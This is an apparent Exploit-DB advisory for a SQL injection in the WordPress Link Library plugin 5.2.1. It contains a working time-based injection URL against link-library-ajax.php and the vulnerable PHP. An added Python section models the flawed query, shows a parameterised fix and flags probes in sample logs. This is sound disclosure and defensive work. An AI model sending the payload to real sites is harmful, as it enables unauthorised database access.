Vendor: Link Library plugin
By: Miroslav Stampar
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Link Library plugin
Affected Version From: 5.2.2001
Affected Version To: 5.2.2001
Patch Exists: NO
Related CWE:
CPE: a:wordpress:link_library:5.2.1
Metasploit:
Other Scripts:
Platforms Tested: WordPress
Year: 2011

WordPress Link Library plugin <= 5.2.1 SQL Injection Vulnerability

The WordPress Link Library plugin, version 5.2.1 and earlier, is vulnerable to SQL injection. link-library-ajax.php passes the searchll GET parameter, unescaped, into a single-quoted LIKE pattern that is then executed through $wpdb->get_results(), so an attacker who can reach that file (the PoC requests it directly, without logging in) can inject arbitrary SQL into the link query. The published PoC is a time-based check: -1') closes the string literal and the opening parenthesis, %23 (a # comment marker) discards the rest of the generated statement, and BENCHMARK(5000000, MD5(...)) delays the response measurably when the injected condition is evaluated. The payload uses /**/ in place of spaces because the plugin splits the parameter on spaces before building the query; a payload containing a literal space would be broken into separate search terms and only the first fragment would reach the query. The injection works only when magic_quotes_gpc is off, since addslashes() would otherwise escape the closing quote.

Mitigation:

Update to a version higher than 5.2.1. Turning magic_quotes_gpc on blocks this particular payload by escaping the closing quote, but it is only a stopgap: the directive was deprecated in PHP 5.3 and removed in PHP 5.4, and it protects nothing that does not arrive through $_GET, $_POST or $_COOKIE. The real fix belongs in the plugin: build the search clause with $wpdb->prepare(), passing each term as a bound value with its LIKE wildcards escaped, instead of concatenating $_GET['searchll'] into the query string.

Exploit-DB raw data:

# Exploit Title: WordPress Link Library plugin <= 5.2.1 SQL Injection Vulnerability
# Date: 2011-09-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/link-library.zip
# Version: 5.2.1 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/link-library/link-library-ajax.php?searchll=-1')/**/AND/**/1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23

---------------
Vulnerable code
---------------
./link-library-ajax.php:
    echo $my_link_library_plugin->LinkLibrary(...);

./link-library.php:
    class link_library_plugin {
        ...
        function LinkLibrary(...) {
            return $this->PrivateLinkLibrary(...)
        ...
        function PrivateLinkLibrary(...) {
            ...
            if ($_GET['searchll'] != "")
            {
                $searchterms = explode(" ", $_GET['searchll']);

                if ($searchterms)
                {
                    $mode = "search";
                    $termnb = 1;

                    foreach($searchterms as $searchterm)
                    {
                        if ($termnb == 1)
                        {
                            $linkquery .= " AND (link_name like '%" . $searchterm . "%' ";
                            $termnb++;
                        }
            ...
            $linkitems = $wpdb->get_results($linkquery, ARRAY_A);
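The following is an added example written for this page; it is not code from the Exploit-DB advisory or from the Link Library plugin. It models in Python the concatenation shown in PrivateLinkLibrary() above (first-term branch only, since that is all the excerpt shows), feeds it the published searchll payload to show the statement the plugin would hand to MySQL, shows why a payload with real spaces breaks and what magic_quotes_gpc changes, gives a parameterised counterpart of the kind $wpdb->prepare() would produce, and runs a detection check over access-log lines. Assumptions: the prefix of $linkquery (BASE_QUERY) is invented because the advisory elides it; esc_like() reimplements the backslash escaping that WordPress's $wpdb->esc_like() performs; the log lines are constructed, not real traffic; and the indicator regex is the editor's own, not part of any product.

```python
"""Added example, not code from the Exploit-DB advisory or the Link Library plugin:
a Python model of the concatenation in PrivateLinkLibrary(), what the published
searchll payload turns it into, a parameterised counterpart, and a log check for
probes of link-library-ajax.php."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Assumed prefix of $linkquery; the advisory elides everything before the " AND (".
BASE_QUERY = "SELECT * FROM wp_links WHERE 1=1"

# The searchll value from the published PoC, URL-decoded (%23 becomes '#').
# CHAR(115,113,108,109,97,112) spells "sqlmap"; it is only a payload marker.
POC_SEARCHLL = unquote_plus(
    "-1')/**/AND/**/1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23"
)


def addslashes(s: str) -> str:
    """PHP addslashes(): what magic_quotes_gpc applied to $_GET when it was enabled."""
    return re.sub(r"(['\"\\])", r"\\\1", s).replace("\0", "\\0")


def build_link_query(searchll: str, magic_quotes: bool = False) -> tuple[str, int]:
    """Mirror the vulnerable branch shown in link-library.php: split on spaces and
    concatenate the first term into a quoted LIKE pattern.  Returns (sql, term count).
    Only the first-term branch is modelled because that is all the excerpt shows."""
    if magic_quotes:
        searchll = addslashes(searchll)
    linkquery = BASE_QUERY
    searchterms = searchll.split(" ")          # explode(" ", $_GET['searchll'])
    if searchll != "" and searchterms:
        linkquery += " AND (link_name like '%" + searchterms[0] + "%' "
    return linkquery, len(searchterms)


def esc_like(s: str) -> str:
    """Escape LIKE wildcards before binding (the job $wpdb->esc_like() does in
    WordPress; the backslash convention here is an assumption matching MySQL)."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def safe_link_query(searchll: str) -> tuple[str, list[str]]:
    """Hardened counterpart: every term becomes a bound %s value, so quotes and
    comment markers inside it can only be matched against, never executed."""
    sql, params = BASE_QUERY, []
    for term in searchll.split(" "):
        if term:
            sql += " AND link_name LIKE %s"
            params.append("%" + esc_like(term) + "%")
    return sql, params


# Indicators that a searchll value is SQL rather than a search term.  A lone quote
# is low-fidelity (think O'Reilly); comment markers and timing functions are not.
SUSPECT = re.compile(r"['\"]|/\*|#|--|\b(?:benchmark|sleep)\s*\(", re.I)


def searchll_indicators(log_line: str) -> list[str]:
    """Return the suspicious tokens found in the searchll parameter of an access-log
    line that targets link-library-ajax.php; an empty list for anything else."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/link-library/link-library-ajax.php"):
        return []
    found = set()
    for value in parse_qs(url.query, keep_blank_values=True).get("searchll", []):
        found.update(SUSPECT.findall(value))      # parse_qs has already URL-decoded
    return sorted(found)


# Constructed sample log lines, not real traffic.
LOG_LINES = [
    '203.0.113.5 - - [16/Sep/2011:10:01:22 +0000] "GET /wp-content/plugins/'
    'link-library/link-library-ajax.php?searchll=security HTTP/1.1" 200 1532',
    '203.0.113.5 - - [16/Sep/2011:10:01:40 +0000] "GET /wp-content/plugins/'
    'link-library/link-library-ajax.php?searchll=-1%27)/**/AND/**/1=IF(2>1,'
    'BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23 HTTP/1.1" 200 1532',
    '198.51.100.7 - - [16/Sep/2011:10:02:03 +0000] "GET /?s=O%27Reilly HTTP/1.1" 200 8800',
]

if __name__ == "__main__":
    sql, n = build_link_query(POC_SEARCHLL)
    print(f"vulnerable ({n} term): {sql}")
    sql, n = build_link_query(POC_SEARCHLL.replace("/**/", " "))
    print(f"with spaces ({n} terms, only the first survives): {sql}")
    print("magic_quotes on:", build_link_query(POC_SEARCHLL, magic_quotes=True)[0])
    print("parameterised:", safe_link_query(POC_SEARCHLL))
    for line in LOG_LINES:
        print(searchll_indicators(line) or "clean", "<-", line[-60:])
```

The split-on-space behaviour is why the advisory's payload is written with /**/ throughout: with ordinary spaces the model reports three terms and only "-1')" lands in the query, which is an unterminated fragment rather than a working injection. For detection, treat the comment markers and BENCHMARK( or SLEEP( as the actionable signals; a bare apostrophe in a search term is common in legitimate traffic and should only raise the score, not trigger on its own.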